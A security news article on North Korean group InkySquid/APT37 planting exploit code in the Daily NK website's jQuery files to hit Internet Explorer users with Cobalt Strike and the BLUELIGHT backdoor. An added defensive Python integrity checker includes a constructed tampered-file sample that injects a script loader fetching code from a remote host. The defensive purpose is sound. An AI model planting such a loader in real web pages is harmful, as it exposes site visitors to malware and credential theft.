Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware
A North Korean threat actor has been found exploiting two Internet Explorer flaws to target individuals with a custom implant, compromising a South Korean online daily newspaper as part of a strategic web compromise (SWC).
Volexity, a cybersecurity firm, attributed the attacks to a threat actor tracked as InkySquid, also known by the monikers ScarCruft and APT37, a well-known North Korean hacking group. Daily NK, the publication in question, is believed to have hosted the malicious code from at least late March 2021 until early June 2021.
InkySquid has been leveraging such vulnerabilities since 2020, planting malicious JavaScript that is typically buried within a site's genuine code in order to attack visitors using Internet Explorer.
In April this year, Volexity identified suspicious code loaded via www.dailynk[.]com to malicious subdomains of jquery[.]services. Two URLs were identified, listed below:
- hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
- hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Volexity's analysts noted that the "clever disguise of exploit code amongst legitimate code", together with the use of bespoke malware, allowed the attackers to evade detection.
The attacks manipulated the jQuery JavaScript libraries on the website to serve further obfuscated code from a remote URL, which was then used to exploit two Internet Explorer vulnerabilities that Microsoft patched in August 2020 and March 2021. The chain delivered a Cobalt Strike stager as well as a new backdoor named BLUELIGHT.
- CVE-2020-1380 (CVSS score: 7.5) – Scripting Engine Memory Corruption Vulnerability
- CVE-2021-26411 (CVSS score: 8.8) – Internet Explorer Memory Corruption Vulnerability
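As an added defender-side example (not from the article or from Volexity), a small Python integrity check of the kind a site operator could run over library files such as the two listed above: compare the served file's hash with a known-good baseline, flag references to hosts a stock jQuery build never mentions, and locate where the served copy diverges from the baseline. The JavaScript strings, the allowlist and the baseline hash (taken from the constructed clean copy) are all constructed for illustration.

```python
import hashlib
import re
from os.path import commonprefix

# Constructed stand-ins for the served library file; not real jQuery source.
TRUSTED_JS = (
    '/*! jQuery v3.5.1 | (c) JS Foundation | jquery.org/license */\n'
    '!function(e,t){"use strict";e.jQuery=e.$=function(){}}(window);\n'
)
# Constructed tampered copy: the same file with a loader spliced into the
# middle that pulls a second stage from a remote host (the SWC pattern).
TAMPERED_JS = TRUSTED_JS.replace(
    '"use strict";',
    '"use strict";var s=t.createElement("script");'
    's.src="https://static.jquery.services/jq.js";t.head.appendChild(s);',
)

# Hosts a legitimate jQuery build is known to mention (license URL, XHTML
# namespace, project site); assumption for this example.
ALLOWED_HOSTS = {"jquery.org", "jquery.com", "www.w3.org"}
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)


def sha256_hex(js: str) -> str:
    return hashlib.sha256(js.encode("utf-8")).hexdigest()


def unexpected_hosts(js: str, allowed=ALLOWED_HOSTS) -> list:
    """Hosts referenced by URL in the file that are not on the allowlist."""
    hosts = {h.lower() for h in HOST_RE.findall(js)}
    return sorted(h for h in hosts
                  if not any(h == a or h.endswith("." + a) for a in allowed))


def locate_injection(trusted: str, served: str):
    """Offset where the served copy first diverges, plus the divergent text."""
    off = len(commonprefix([trusted, served]))
    return off, served[off:off + 120]


def audit_js(js: str, expected_sha256: str, allowed=ALLOWED_HOSTS) -> dict:
    """Integrity verdict for one served file against its known-good baseline."""
    return {"hash_ok": sha256_hex(js) == expected_sha256,
            "unexpected_hosts": unexpected_hosts(js, allowed)}


if __name__ == "__main__":
    baseline = sha256_hex(TRUSTED_JS)
    for name, js in (("trusted", TRUSTED_JS), ("served", TAMPERED_JS)):
        print(name, audit_js(js, baseline))
    print("diverges at", locate_injection(TRUSTED_JS, TAMPERED_JS))
```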
Both vulnerabilities had previously been exploited in the wild by North Korean hackers to target security researchers working on vulnerability research and development, in a campaign uncovered earlier in January.
Once the Cobalt Strike stager has run, BLUELIGHT is deployed as a secondary payload: a full-featured remote access tool that gives complete access to the compromised system.
Besides collecting system metadata and information about installed antivirus products, the malware can execute shellcode, harvest cookies and credentials from Internet Explorer, Microsoft Edge, and Google Chrome, collect files, and download arbitrary executables, with the results exfiltrated to a remote server.